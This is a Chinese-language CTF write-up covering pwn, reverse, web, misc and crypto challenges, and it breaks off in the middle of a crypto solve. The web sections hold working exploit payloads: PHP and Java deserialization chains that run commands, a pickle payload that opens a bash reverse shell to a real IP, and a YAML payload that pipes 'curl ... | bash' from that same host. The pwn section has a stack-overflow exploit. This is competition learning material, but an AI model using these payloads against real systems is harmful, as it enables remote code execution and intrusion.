PWN
risky_login
RISC-V的文件,可以通过ghidra进行解析分析。
已知是存在后门的,我们只需要想办法调用后门即可。
首先程序会要求我们输入name和word,同时会校验长度。回到产生漏洞的函数。
这里在校验的过程中,sVar1的数据类型为size_t,也就是单字节。如果我们的word长度超过了255,就会发生溢出,0x100就会变成0x00,从而绕过检查。之后就会导致栈溢出。
123456789101112131415 |
from pwn import *context.log_level = 'debug'p = remote('tcp.cloud.dasctf.com', '26401')p.recvuntil('name:\n')p.sendline('prowes5')p.recvuntil('words\n')payload = 'a'*248+'aaaaaaaa'+p64(0x123456ee)p.sendline(payload)p.interactive() |
至于后门里边的sh和flag过滤,无所谓,cat f*即可。
REVERSE
Ez加密器
会要求输入验证码和flag进行check,而验证码给了条件,为6位的纯数字。输入验证码之后会进行换表的base64加密生成8位key,与输入的flag进行DES加密。(虽然验证码很短,但下次别出爆破题了)
123456789101112131415161718192021222324252627282930313233343536373839404142 |
# -*- coding: utf-8import base64import stringfrom Crypto.Cipher import DESSTANDARD_ALPHABET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'CUSTOM_ALPHABET = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ+/'ENCODE_TRANS = string.maketrans(STANDARD_ALPHABET, CUSTOM_ALPHABET)def encode(input): return base64.b64encode(input).translate(ENCODE_TRANS)des = DES.new(enstr, DES.MODE_ECB)cip = '4528C12515A4591305CDB174C08CE2866601C9A8D9A91AC305CDB174C08CE286EECF54107D41240D7D2CAC2DBA32DA72'plaintext = des.decrypt(cip.decode('hex'))print plaintextcip2 = '0723105D5C12217DCDC3601F5ECB54DA9CCEC2279F1684A13A0D716D17217F4C9EA85FF1A42795731CA3C55D3A4D7BEA'table = '0123456789'for i1 in table:print i1for i2 in table:for i3 in table:for i4 in table:for i5 in table:for i6 in table:key = encode(i1+i2+i3+i4+i5+i6)des = DES.new(key, DES.MODE_ECB)flag = des.decrypt(cip2.decode('hex'))if 'DASCTF{' in flag:print flagprint keyraw_input()'''DASCTF{f771b96b71514bb6bc20f3275fa9404e}mtuNndAM151490''' |
vm_wo
mac逆向,什么意思,欺负没mac电脑的。虽然是mac逆向,但就是一个简单的vm,完全可以手撸代码,而且没去符号就更简单了。
恢复的大概代码如下
12345678910111213141516171819202122232425 |
vm_body[0] = a1vm_body[1] = vm_body[0] >> 1vm_body[2] = vm_body[0] << 7vm_body[0] = vm_body[2] | vm_body[1]vm_body[0] ^= 0xEFvm_body[0] = a1vm_body[1] = vm_body[0] >> 2vm_body[2] = vm_body[0] << 6vm_body[0] = vm_body[2] | vm_body[1]vm_body[0] ^= 0xBEvm_body[0] = a1vm_body[1] = vm_body[0] >> 3vm_body[2] = vm_body[0] << 5vm_body[0] = vm_body[2] | vm_body[1]vm_body[0] ^= 0xEDvm_body[0] = a1vm_body[1] = vm_body[0] >> 4vm_body[2] = vm_body[0] << 4vm_body[0] = vm_body[2] | vm_body[1]vm_body[0] ^= 0xBE*a1++ = (vm_body[0] >> 5) | (vm_body[0] << 3); |
写出解密exp即可。
123456789101112131415161718 |
cipher = [0xDF, 0xD5, 0xF1, 0xD1, 0xFF, 0xDB, 0xA1, 0xA5, 0x89, 0xBD, 0xE9, 0x95, 0xB3, 0x9D, 0xE9, 0xB3, 0x85, 0x99, 0x87, 0xBF, 0xE9, 0xB1, 0x89, 0xE9, 0x91, 0x89, 0x89, 0x8F, 0xAD]flag = ''for i in range(len(cipher)): tmp = cipher[i] tmp = (tmp >> 3) | ((tmp << 5) & 0xff) tmp ^= 0xBE tmp = (tmp >> 4) | ((tmp << 4) & 0xff) tmp ^= 0xed tmp = (tmp >> 5) | ((tmp << 3) & 0xff) tmp ^= 0xBE tmp = (tmp >> 6) | ((tmp << 2) & 0xff) tmp ^= 0xef tmp = (tmp >> 7) | ((tmp << 1) & 0xff) flag += chr(tmp)print flag |
Blast
这题,从文件里边可以扒出来一堆md5
随便拿一个去在线解一下,可以知道是单字节,爆破即可。
12345678910111213141516 |
import hashlibmd5s = ['14d89c38cd0fb23a14be2798d449c182', 'a94837b18f8f43f29448b40a6e7386ba', 'af85d512594fc84a5c65ec9970956ea5', 'af85d512594fc84a5c65ec9970956ea5', '10e21da237a4a1491e769df6f4c3b419', 'a705e8280082f93f07e3486636f3827a', '297e7ca127d2eef674c119331fe30dff', 'b5d2099e49bdb07b8176dff5e23b3c14', '83be264eb452fcf0a1c322f2c7cbf987', 'a94837b18f8f43f29448b40a6e7386ba', '71b0438bf46aa26928c7f5a371d619e1', 'a705e8280082f93f07e3486636f3827a', 'ac49073a7165f41c57eb2c1806a7092e', 'a94837b18f8f43f29448b40a6e7386ba', 'af85d512594fc84a5c65ec9970956ea5', 'ed108f6919ebadc8e809f8b86ef40b05', '10e21da237a4a1491e769df6f4c3b419', '3cfd436919bc3107d68b912ee647f341', 'a705e8280082f93f07e3486636f3827a', '65c162f7c43612ba1bdf4d0f2912bbc0', '10e21da237a4a1491e769df6f4c3b419', 'a705e8280082f93f07e3486636f3827a', '3cfd436919bc3107d68b912ee647f341', '557460d317ae874c924e9be336a83cbe', 'a705e8280082f93f07e3486636f3827a', '9203d8a26e241e63e4b35b3527440998', '10e21da237a4a1491e769df6f4c3b419', 'f91b2663febba8a884487f7de5e1d249', 'a705e8280082f93f07e3486636f3827a', 'd7afde3e7059cd0a0fe09eec4b0008cd', '488c428cd4a8d916deee7c1613c8b2fd', '39abe4bca904bca5a11121955a2996bf', 'a705e8280082f93f07e3486636f3827a', '3cfd436919bc3107d68b912ee647f341', '39abe4bca904bca5a11121955a2996bf', '4e44f1ac85cd60e3caa56bfd4afb675e', '45cf8ddfae1d78741d8f1c622689e4af', '3cfd436919bc3107d68b912ee647f341', '39abe4bca904bca5a11121955a2996bf', '4e44f1ac85cd60e3caa56bfd4afb675e', '37327bb06c83cb29cefde1963ea588aa', 'a705e8280082f93f07e3486636f3827a', '23e65a679105b85c5dc7034fded4fb5f', '10e21da237a4a1491e769df6f4c3b419', '71b0438bf46aa26928c7f5a371d619e1', 'af85d512594fc84a5c65ec9970956ea5', '39abe4bca904bca5a11121955a2996bf']plaintext = ''for i in range(len(md5s)): for x in range(32, 128): m = hashlib.md5(chr(x)) tmp = m.hexdigest() m = hashlib.md5(tmp) tmp = m.hexdigest() if tmp == md5s[i]: plaintext += chr(x)print plaintext |
CSGO
Golang写的,换表base64,没啥可说的,一把梭。
WEB
D0n’t pl4y g4m3!!! -FIX
PHP<=7.4.21 Development Server读源码
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687 |
class Pro{ private $exp = array('finish'=>true); private $rce2 = 'finish'; public function __get($name){ echo '111'; echo $this->$rce2; return $this->$rce2=$this->exp[$rce2]; } public function __toString(){ echo 'aaaaaaaaaaaaaa'; call_user_func('system', "cat /flag"); }}class Yang{ public $finish; public $now;// public function __construct(){// $this->finish = new Pro;// } public function __call($name, $ary){ echo 'ccc'; if ($this->key === true || $this->finish1->name) { if ($this->finish->finish) { echo 'aaa'; echo "\n"; var_dump($this->now); var_dump($ary[0]); call_user_func($this->now[$name], $ary[0]); } } } public function ycb(){ $this->now = 0; echo 'aaa'; return $this->finish->finish; } public function __wakeup(){ $this->key = True; }}class Cheng{ private $finish; public $name = array('finish'=>true); public function __get($value){ echo 'bbb'; return $this->$value = $this->name[$value]; }}class Bei{ public function __construct(){ $this->rce = 'cat /tmp/*'; $this->rce1 = ''; $this->CTF = new Yang; $this->CTF->finish = new Cheng; $this->fine = new Yang; $this->fine->finish = new Cheng; $this->fine->key = true; $this->fine->now = array('YCB1'=>'sysystemstem'); } public function __destruct(){ if ($this->CTF->ycb()) { $this->fine->YCB1($this->rce, $this->rce1); } } public function __wakeup() //绕过{ $this->key = false; }}$a = new Bei;echo(urlencode(serialize($a))); |
Ez_java
信息收集
反序列化写文件
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647 |
package com.ycbjava;import com.ycbjava.Utils.HtmlInvocationHandler;import com.ycbjava.Utils.HtmlMap;import java.io.ByteArrayOutputStream;import java.io.ObjectOutputStream;import java.lang.reflect.Constructor;import java.lang.reflect.Proxy;import java.util.Base64;import java.util.Map;public class Main { public static void main(String[] args) throws Exception { HtmlMap htmlMap = new HtmlMap(); htmlMap.filename = "index.ftl"; htmlMap.content = "<#assign ac=springMacroRequestContext.webApplicationContext>\n" + "<#assign fc=ac.getBean('freeMarkerConfiguration')>\n" + "<#assign dcr=fc.getDefaultConfiguration().getNewBuiltinClassResolver()>\n" + "<#assign VOID=fc.setNewBuiltinClassResolver(dcr)>${\"freemarker.template.utility.Execute\"?new()(\"cat /flag\")}"; HtmlInvocationHandler htmlInvocationHandler = new HtmlInvocationHandler(); htmlInvocationHandler.obj=htmlMap; Map<?, ?> mapproxy = (Map<?, ?>) Proxy.newProxyInstance( ClassLoader.getSystemClassLoader(), new Class[]{Map.class}, htmlInvocationHandler ); Class<?> aClass = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); Constructor<?> constructor = aClass.getDeclaredConstructor(Class.class, Map.class); constructor.setAccessible(true); Object obj = constructor.newInstance(Override.class, mapproxy); byte[] serializedObj = ser(obj); String encodedObj = Base64.getEncoder().encodeToString(serializedObj); System.out.println(encodedObj); } public static byte[] ser(Object obj) throws Exception { try (ByteArrayOutputStream outputStream = new ByteArrayOutputStream(); ObjectOutputStream objectOutputStream = new ObjectOutputStream(outputStream)) { objectOutputStream.writeObject(obj); objectOutputStream.flush(); return outputStream.toByteArray(); } }} |
getflag的data提交 templating传递name获取渲染的模板
Serpent
伪造session
访问/ppppppppppick1e响应头得到提示
访问得到picke源码 参考https://xz.aliyun.com/t/7436
123456 |
import base64a=b'''(cossystemS'bash-c "bash-i>&/dev/tcp/8.130.38.17/7777 0>&1"'o.'''print(base64.b64encode(a)) |
传递给session中的p1eke,获取到反弹shell,suid提权
ArkNights
12345678910111213141516171819202122232425262728293031323334353637383940414243444546 |
import uuidfrom flask import *from werkzeug.utils import *app = Flask(__name__)app.config['SECRET_KEY'] =str(uuid.uuid4()).replace("-","*")+"Boogipopisweak"def index(): name=request.args.get("name","name") m1sery=[request.args.get("m1sery","Doctor.Boogipop")] if(session.get("name")=="Dr.Boog1pop"): blacklist=re.findall("/ba|sh|\\\\|\[|]|#|system|'|\"/", name, re.IGNORECASE) if blacklist: return "bad hacker no way" exec(f'for [{name}] in [{m1sery}]:print("strange?")') else: session['name'] = "Doctor" return render_template("index.html",name=session.get("name"))def read(): file = request.args.get('file') fileblacklist=re.findall("/flag|fl|ag/",file, re.IGNORECASE) if fileblacklist: return "bad hacker!" start=request.args.get("start","0") end=request.args.get("end","0") if start=="0" and end=="0": return open(file,"rb").read() else: start,end=int(start),int(end) f=open(file,"rb") f.seek(start) data=f.read(end) return datadef render_page(path): print(os.path.pardir) print(path) if not os.path.exists("templates/" + path): return "not found", 404 return render_template(path)if __name__=='__main__': app.run( debug=False, host="0.0.0.0" ) print(app.config['SECRET_KEY']) |
读取getf file查环境变量 /proc/1/environ 得到flag
ezyaml
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475 |
import tarfilefrom flask import Flask, render_template, request, redirectfrom hashlib import md5import yamlimport osimport reapp = Flask(__name__)def waf(s): flag = True blacklist = ['bytes','eval','map','frozenset','popen','tuple','exec','\\','object','listitems','subprocess','object','apply'] for no in blacklist: if no.lower() in str(s).lower(): flag= False print(no) break return flagdef extractFile(filepath, type): extractdir = filepath.split('.')[0] if not os.path.exists(extractdir): os.makedirs(extractdir) if type == 'tar': tf = tarfile.TarFile(filepath) tf.extractall(extractdir) return tf.getnames()def main(): fn = 'uploads/' + md5().hexdigest() if not os.path.exists(fn): os.makedirs(fn) return render_template('index.html')def upload(): if request.method == 'GET': return redirect('/') if request.method == 'POST': upFile = request.files['file'] print(upFile) if re.search(r"\.\.|/", upFile.filename, re.M|re.I) != None: return "<script>alert('Hacker!');window.location.href='/upload'</script>" savePath = f"uploads/{upFile.filename}" print(savePath) upFile.save(savePath) if tarfile.is_tarfile(savePath): zipDatas = extractFile(savePath, 'tar') return render_template('result.html', path=savePath, files=zipDatas) else: return f"<script>alert('{upFile.filename} upload successfully');history.back(-1);</script>"def src(): if request.args: username = request.args.get('username') with open(f'config/{username}.yaml', 'rb') as f: Config = yaml.load(f.read()) return render_template('admin.html', username="admin", message="success") else: return render_template('index.html')if __name__ == '__main__': app.run(host='0.0.0.0', port=8000) |
这个题目跟比赛中的https://juejin.cn/post/7108978403704832037题目相似度很高
参考:https://infosecwriteups.com/zippy-challenge-writeup-cyberhack-ctf-80eb1d422249
参考:https://security.snyk.io/research/zip-slip-vulnerability
这里思路就是利用解压tar包覆盖config下的yaml文件,通过yaml.load进行恶意加载
利用文章中的代码
进行构造反弹shell
1234 |
!!python/object/new:tuple- !!python/object/new:map - !!python/name:eval - [ __import__('os').system('curl http://8.130.38.17/1.txt | bash') ] |
使用–transform参数
上传解压访问/src?username=caidao即可触发
(这题思路没错就是没有找到覆盖的方法,不停百度不停试试)
MISC
EZ_misc
使用工具修复出原始高宽
文件中得到压缩包:内容为vzbtrvplnnvphsqkxsiqibroou
解密得到
| try to think the s nipping tools |
|---|
try to think the s nipping tools
参考:https://blog.csdn.net/weixin_64422989/article/details/131993859
最终得到flag
Matryoshka
挂载
提取文件,foremos得到图片
得到:watermark_is_fun
vc挂载容器
找到flag.txt
其中隐藏了零宽字节,解密得到Matryoshka
CRYPTO
Danger_RSA
12345678910111213141516171819202122232425262728 |
from Crypto.Util.number import *#m = bytes_to_long(flag)def get_key(a, nbit): assert a >= 2 while True: X = getRandomInteger(nbit // a) s = getRandomRange(pow(2, a ** 2 - a + 4), pow(2, a ** 2 - a + 5)) p = X ** a + s if isPrime(p): return (p, s)a=5p, s = get_key(a, 1024)q, t = get_key(a, 1024)print(p,q,s,t)N = p * qe = s * t#c = pow(m, e, N)print("N =", N)print("e =", e)#print("c =", c)# N = 20289788565671012003324307131062103060859990244423187333725116068731043744218295859587498278382150779775620675092152011336913225797849717782573829179765649320271927359983554162082141908877255319715400550981462988869084618816967398571437725114356308935833701495015311197958172878812521403732038749414005661189594761246154666465178024563227666440066723650451362032162000998737626370987794816660694178305939474922064726534186386488052827919792122844587807300048430756990391177266977583227470089929347969731703368720788359127837289988944365786283419724178187242169399457608505627145016468888402441344333481249304670223# e = 11079917583# c = 13354219204055754230025847310134936965811370208880054443449019813095522768684299807719787421318648141224402269593016895821181312342830493800652737679627324687428327297369122017160142465940412477792023917546122283870042482432790385644640286392037986185997262289003477817675380787176650410819568815448960281666117602590863047680652856789877783422272330706693947399620261349458556870056095723068536573904350085124198592111773470010262148170379730937529246069218004969402885134027857991552224816835834207152308645148250837667184968030600819179396545349582556181916861808402629154688779221034610013350165801919342549766 |
CryptoCTF 2023 原题 2023 CryptoCTF(二) (qq.com)
123456789101112131415161718192021222324252627 |
from gmpy2 import *from sympy import isprimen=20289788565671012003324307131062103060859990244423187333725116068731043744218295859587498278382150779775620675092152011336913225797849717782573829179765649320271927359983554162082141908877255319715400550981462988869084618816967398571437725114356308935833701495015311197958172878812521403732038749414005661189594761246154666465178024563227666440066723650451362032162000998737626370987794816660694178305939474922064726534186386488052827919792122844587807300048430756990391177266977583227470089929347969731703368720788359127837289988944365786283419724178187242169399457608505627145016468888402441344333481249304670223ab = int(iroot(n,4)[0])ab4 = ab^4rs = 11079917583for r in rs.divisors(): s = rs//r c = n-ab4-rs delta = c^2-4*rs*ab4 sdelta = int(iroot(delta,2)[0]) a4 = (c+sdelta)//(2*s) if iroot(a4,4)[1]: a = int(iroot(a4,4)[0]) b = int(iroot(ab4,4)[0]//a) if isprime(a^4+r): print("[+] p=",a^4+r) print("[+] q=",n//(a^4+r)) elif isprime(a^4+s): print("[+] p=",a^4+s) print("[+] q=",n//(a^4+s))[+] p= 5213351003420231819415242686664610206224730148063270274863722096379841592931572096469136339538500817713355302889731144789372844731378975059329731297860686270736540109105854515590165681366189003405833252270606896051264517339339578167231093908235856718285980689179840159807651185918046198419707669304960745217[+] q= 3891889986375336330559716098591764128742918441309724777337583126578227827768865619689858547513951476952436981068109005313431255086775128227872912287517417948310766208005723508039484956447166240210962374423348694952997002274647622939970550008327647559433222317977926773242269276334110863262269534189811138319 |
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107 |
import randomimport timefrom tqdm import tqdmfrom Crypto.Util.number import *# About 3 seconds to rundef AMM(o, r, q): start = time.time() print('\n----------------------------------------------------------------------------------') print('Start to run Adleman-Manders-Miller Root Extraction Method') print('Try to find one {:#x}th root of {} modulo {}'.format(r, o, q)) g = GF(q) o = g(o) p = g(random.randint(1, q)) while p ^ ((q-1) // r) == 1: p = g(random.randint(1, q)) print('[+] Find p:{}'.format(p)) t = 0 s = q - 1 while s % r == 0: t += 1 s = s // r print('[+] Find s:{}, t:{}'.format(s, t)) k = 1 while (k * s + 1) % r != 0: k += 1 alp = (k * s + 1) // r print('[+] Find alp:{}'.format(alp)) a = p ^ (r**(t-1) * s) b = o ^ (r*alp - 1) c = p ^ s h = 1 for i in range(1, t): d = b ^ (r^(t-1-i)) if d == 1: j = 0 else: print('[+] Calculating DLP...') j = - discrete_log(d, a) print('[+] Finish DLP...') b = b * (c^r)^j h = h * c^j c = c^r result = o^alp * h end = time.time() print("Finished in {} seconds.".format(end - start)) print('Find one solution: {}'.format(result)) return resultdef onemod(p,r): t=random.randint(2,p) while pow(t,(p-1)//r,p)==1: t=random.randint(2,p) return pow(t,(p-1)//r,p) def solution(p,root,e): while True: g=onemod(p,e) may=[] for i in tqdm(range(e)): may.append(root*pow(g,i,p)%p) if len(may) == len(set(may)): return maydef solve_in_subset(ep,p): cp = int(pow(c,inverse(int(e//ep),p-1),p)) com_factors = [] while GCD(ep,p-1) !=1: com_factors.append(GCD(ep,p-1)) ep //= GCD(ep,p-1) com_factors.sort() cps = [cp] for factor in com_factors: mps = [] for cp in cps: mp = AMM(cp, factor, p) mps += solution(p,mp,factor) cps = mps for each in cps: assert pow(each,e,p)==c%p return cpsp= 5213351003420231819415242686664610206224730148063270274863722096379841592931572096469136339538500817713355302889731144789372844731378975059329731297860686270736540109105854515590165681366189003405833252270606896051264517339339578167231093908235856718285980689179840159807651185918046198419707669304960745217q = 3891889986375336330559716098591764128742918441309724777337583126578227827768865619689858547513951476952436981068109005313431255086775128227872912287517417948310766208005723508039484956447166240210962374423348694952997002274647622939970550008327647559433222317977926773242269276334110863262269534189811138319e = 11079917583c = 13354219204055754230025847310134936965811370208880054443449019813095522768684299807719787421318648141224402269593016895821181312342830493800652737679627324687428327297369122017160142465940412477792023917546122283870042482432790385644640286392037986185997262289003477817675380787176650410819568815448960281666117602590863047680652856789877783422272330706693947399620261349458556870056095723068536573904350085124198592111773470010262148170379730937529246069218004969402885134027857991552224816835834207152308645148250837667184968030600819179396545349582556181916861808402629154688779221034610013350165801919342549766ep = 3eq = 49m_p = solve_in_subset(ep,p)m_q = solve_in_subset(eq,q)start = time.time()print('Start CRT...')for mpp in m_p: for mqq in m_q: solution = CRT_list([int(mpp), int(mqq)], [p, q]) if solution < 2^800 : # Always the bit_length of flag is less than 800 print(long_to_bytes(solution))end = time.time()print("Finished in {} seconds.".format(end - start)) |
DASCTF{C0nsTruct!n9_Techn1qUe2_f0r_RSA_Pr1me_EnC2ypt10N}
SigninCrypto
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869 |
from random import *from Crypto.Util.number import *from Crypto.Cipher import DES3from flag import flagfrom key import keyfrom iv import ivimport osimport hashlibimport secretsK1= keyhint1 = os.urandom(2) * 8xor =bytes_to_long(hint1)^bytes_to_long(K1)print(xor)def Rand(): rseed = secrets.randbits(1024) List1 = [] List2 = [] seed(rseed) for i in range(624): rand16 = getrandbits(16) List1.append(rand16) seed(rseed) for i in range(312): rand64 = getrandbits(64) List2.append(rand64) with open("task.txt", "w") as file: for rand16 in List1: file.write(hex(rand16)+ "\n") for rand64 in List2: file.write(hex((rand64 & 0xffff) | ((rand64 >> 32) & 0xffff) << 16) + "\n")Rand()K2 = long_to_bytes(getrandbits(64))K3 = flag[:8]KEY = K1 + K2 + K3IV=ivIV1=IV[:len(IV)//2]IV2=IV[len(IV)//2:]digest1 = hashlib.sha512(IV1).digest().hex()digest2 = hashlib.sha512(IV2).digest().hex()digest=digest1+digest2hint2=(bytes_to_long(IV)<<32)^bytes_to_long(os.urandom(8))print(hex(bytes_to_long((digest.encode()))))print(hint2)mode = DES3.MODE_CBCdes3 = DES3.new(KEY, mode, IV)pad_len = 8 - len(flag) % 8padding = bytes([pad_len]) * pad_lenflag += paddingcipher = des3.encrypt(flag)ciphertext=cipher.hex()print(ciphertext)# 334648638865560142973669981316964458403# 0x62343937373634656339396239663236643437363738396663393438316230353665353733303939613830616662663633326463626431643139323130616333363363326631363235313661656632636265396134336361623833636165373964343533666537663934646239396462323666316236396232303539336438336234393737363465633939623966323664343736373839666339343831623035366535373330393961383061666266363332646362643164313932313061633336336332663136323531366165663263626539613433636162383363616537396434353366653766393464623939646232366631623639623230353933643833# 22078953819177294945130027344# a6546bd93bced0a8533a5039545a54d1fee647007df106612ba643ffae850e201e711f6e193f15d2124ab23b250bd6e1 |
K1 :hint1是2字节随机数 * 8,但是 K1不是16字节,根据 xor 可以获取道 hint1 是 ‘\xfb\xc2’,然后异或回来就能获取 K1 了
K2:MT19937,老套路了,list1和list2 是互补的,相互拼接就能得到 624 个完整的 32 字节随机数,然后往后生成一个 64 bit 随机数就好了,我这里生成了两个 32 比特随机数然后拼接,long_to_bytes((2007704621<<32)+1688604302),
1234567891011121314151617 |
with open("task.txt") as f:data = f.read().split("\n")data = [int(i[2:],16) for i in data]#print(data)rand = data[:624]index = 0for each in data[624:]:rand[index] = (rand[index]<<16)+ (each & 0xffff)each2 = each >> 16rand[index+1] = (rand[index+1]<<16)+ (each2 & 0xffff)index+=2print(rand) |
K3:一个字节爆破,K3 = b’DASCTF{‘+chr(j).encode()
IV:IV是8字节的。所以 hint2 泄露了 IV 的高四字节,通过看哈希,高四字节和低四字节是一样的,IV 是 ‘GWHTGWHT’
然后拿着 K1,K2,K3 和 IV 解密密文就好了
123456789101112131415161718192021222324252627282930313233343536 |
from random import *from Crypto.Util.number import *from Crypto.Cipher import DES3# from flag import flag# from key import key# from iv import ivimport osimport hashlibimport secretshint1 = b'\xfb\xc2'for j in range(128): xor = 334648638865560142973669981316964458403 K1 = long_to_bytes(bytes_to_long(hint1*8)^xor) #print(K1) K2 = long_to_bytes((2007704621<<32)+1688604302) #K3 = flag[:8] K3 = b'DASCTF{'+chr(j).encode() KEY = K1 + K2 + K3 #print(KEY) IV=b'GWHTGWHT' flag= 0xa6546bd93bced0a8533a5039545a54d1fee647007df106612ba643ffae850e201e711f6e193f15d2124ab23b250bd6e1 flag = long_to_bytes(flag) mode = DES3.MODE_CBC des3 = DES3.new(KEY, mode, IV) cipher = des3.decrypt(flag) if b"DASCTF" in cipher: print(cipher) |
DASCTF{8e5ee461-f4e1-4af2-8632-c9d62f4dc073}
MCeorpkpleer
12345678910111213141516171819202122232425262728293031323334353637383940414243444546 |
from Crypto.Util.number import *from secret import flagdef pubkey(list, m, w): pubkey_list = [] for i in range(len(e_bin)): pubkey_list.append(w * list[i] % m) return pubkey_listdef e_cry(e, pubkey): pubkey_list = pubkey encode = 0 for i in range(len(e)): encode += pubkey_list[i] * int(e[i]) % m return encodep = getPrime(1024)q = getPrime(1024)n = p * qe = getPrime(64)m = bytes_to_long(flag)c = pow(m, e, n)e_bin = (bin(e))[2:]list = [pow(3, i) for i in range(len(e_bin))]m = getPrime(len(bin(sum(list))) - 1)w = getPrime(64)pubkey = pubkey(list, m, w)en_e = e_cry(e_bin, pubkey)print('p = {}\n' 'n = {}\n' 'c = {}\n' 'pubkey = {}\n' 'en_e = {}'.format((p >> 435) << 435, n, c, pubkey, en_e))'''p = 139540788452365306201344680691061363403552933527922544113532931871057569249632300961012384092481349965600565669315386312075890938848151802133991344036696488204791984307057923179655351110456639347861739783538289295071556484465877192913103980697449775104351723521120185802327587352171892429135110880845830815744n = 22687275367292715121023165106670108853938361902298846206862771935407158965874027802803638281495587478289987884478175402963651345721058971675312390474130344896656045501040131613951749912121302307319667377206302623735461295814304029815569792081676250351680394603150988291840152045153821466137945680377288968814340125983972875343193067740301088120701811835603840224481300390881804176310419837493233326574694092344562954466888826931087463507145512465506577802975542167456635224555763956520133324723112741833090389521889638959417580386320644108693480886579608925996338215190459826993010122431767343984393826487197759618771c = 156879727064293983713540449709354153986555741467040286464656817265584766312996642691830194777204718013294370729900795379967954637233360644687807499775502507899321601376211142933572536311131955278039722631021587570212889988642265055045777870448827343999745781892044969377246509539272350727171791700388478710290244365826497917791913803035343900620641430005143841479362493138179077146820182826098057144121231954895739989984846588790277051812053349488382941698352320246217038444944941841831556417341663611407424355426767987304941762716818718024107781873815837487744195004393262412593608463400216124753724777502286239464pubkey = [18143710780782459577, 54431132342347378731, 163293397027042136193, 489880191081126408579, 1469640573243379225737, 4408921719730137677211, 13226765159190413031633, 39680295477571239094899, 119040886432713717284697, 357122659298141151854091, 1071367977894423455562273, 3214103933683270366686819, 9642311801049811100060457, 28926935403149433300181371, 86780806209448299900544113, 260342418628344899701632339, 781027255885034699104897017, 2343081767655104097314691051, 7029245302965312291944073153, 21087735908895936875832219459, 63263207726687810627496658377, 189789623180063431882489975131, 569368869540190295647469925393, 1708106608620570886942409776179, 601827224419797931380408071500, 1805481673259393794141224214500, 893952418336266652976851386463, 2681857255008799958930554159389, 3523079163584485147344841221130, 1524252287869625983140881149316, 50264262166963219975822190911, 150792786500889659927466572733, 452378359502668979782399718199, 1357135078508006939347199154597, 4071405235524020818041597463791, 3169230503688232995231149877299, 462706308180869526799807117823, 1388118924542608580399421353469, 4164356773627825741198264060407, 3448085117999647764701149667147, 1299270151115113835209806487367, 3897810453345341505629419462101, 2648446157152195057994615872229, 3422845870014670444537026359650, 1223552407160181874717436564876, 3670657221480545624152309694628, 1966986461557807413563286569810, 1378466783231507511243038452393, 4135400349694522533729115357179, 3361215846199738142293703557463, 1038662335715384967987468158315, 3115987007146154903962404474945, 302975818554635252993570910761, 908927455663905758980712732283, 2726782366991717276942138196849, 3657854499533237101379593333510, 1928578295715881845245137486456, 1263242285705730806288591202331, 3789726857117192418865773606993, 2324195368467747797703678306905, 2450093503961328663664213663678, 2827787910442071261545819733997, 3960871129884299055190637944954, 2837628186769067706678271320788]en_e = 31087054322877663244023458448558''' |
代码写得真绕,其实就是一个背包+一个已知 p 高位
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152 |
#matrixm=[] a = [18143710780782459577, 54431132342347378731, 163293397027042136193, 489880191081126408579, 1469640573243379225737, 4408921719730137677211, 13226765159190413031633, 39680295477571239094899, 119040886432713717284697, 357122659298141151854091, 1071367977894423455562273, 3214103933683270366686819, 9642311801049811100060457, 28926935403149433300181371, 86780806209448299900544113, 260342418628344899701632339, 781027255885034699104897017, 2343081767655104097314691051, 7029245302965312291944073153, 21087735908895936875832219459, 63263207726687810627496658377, 189789623180063431882489975131, 569368869540190295647469925393, 1708106608620570886942409776179, 601827224419797931380408071500, 1805481673259393794141224214500, 893952418336266652976851386463, 2681857255008799958930554159389, 3523079163584485147344841221130, 1524252287869625983140881149316, 50264262166963219975822190911, 150792786500889659927466572733, 452378359502668979782399718199, 1357135078508006939347199154597, 4071405235524020818041597463791, 3169230503688232995231149877299, 462706308180869526799807117823, 1388118924542608580399421353469, 4164356773627825741198264060407, 3448085117999647764701149667147, 1299270151115113835209806487367, 3897810453345341505629419462101, 2648446157152195057994615872229, 3422845870014670444537026359650, 1223552407160181874717436564876, 3670657221480545624152309694628, 1966986461557807413563286569810, 1378466783231507511243038452393, 4135400349694522533729115357179, 3361215846199738142293703557463, 1038662335715384967987468158315, 3115987007146154903962404474945, 302975818554635252993570910761, 908927455663905758980712732283, 2726782366991717276942138196849, 3657854499533237101379593333510, 1928578295715881845245137486456, 1263242285705730806288591202331, 3789726857117192418865773606993, 2324195368467747797703678306905, 2450093503961328663664213663678, 2827787910442071261545819733997, 3960871129884299055190637944954, 2837628186769067706678271320788]#Pub# a = 31087054322877663244023458448558#encs = 31087054322877663244023458448558#init latticefor i in range(len(a)): b=[] for j in range(len(a)): if i == j: b.append(2) else: b.append(0) m.append(b)b=[]for i in range(len(m)): m[i].append(a[i]) b.append(1)b.append(s)m.append(b)#print(len(m[0])) M = matrix(ZZ, m)print("Start LLL")ML = M.LLL()for each in ML: for i in each: if i == 1 or i == -1 or i==0: pass else: break else: v = eachprint(v)flag=''for i in v[:-1]: if i < 0: flag+='1' else: flag+='0'sage: flag'1101110101111111101010101111101101001110100000010000100001010011'sage: int(flag,2)15960663600754919507 |
123456789101112 |
p = 139540788452365306201344680691061363403552933527922544113532931871057569249632300961012384092481349965600565669315386312075890938848151802133991344036696488204791984307057923179655351110456639347861739783538289295071556484465877192913103980697449775104351723521120185802327587352171892429135110880845830815744n = 22687275367292715121023165106670108853938361902298846206862771935407158965874027802803638281495587478289987884478175402963651345721058971675312390474130344896656045501040131613951749912121302307319667377206302623735461295814304029815569792081676250351680394603150988291840152045153821466137945680377288968814340125983972875343193067740301088120701811835603840224481300390881804176310419837493233326574694092344562954466888826931087463507145512465506577802975542167456635224555763956520133324723112741833090389521889638959417580386320644108693480886579608925996338215190459826993010122431767343984393826487197759618771c = 